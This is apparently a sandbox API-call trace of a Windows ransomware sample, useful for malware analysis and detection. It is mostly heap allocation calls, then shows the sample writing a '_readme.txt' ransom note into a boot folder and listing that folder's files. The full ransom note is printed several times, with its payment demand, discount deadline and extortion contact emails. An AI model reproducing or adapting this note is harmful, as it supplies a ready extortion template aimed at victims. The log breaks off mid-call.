RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.658] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0227.658] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.658] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.659] PathFindFileNameW (pszPath="") returned="" [0227.659] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.659] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.659] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.660] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.660] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0227.660] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0227.660] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.660] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.660] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.661] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.661] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.661] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.661] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.661] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.662] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.663] HeapFree (in: 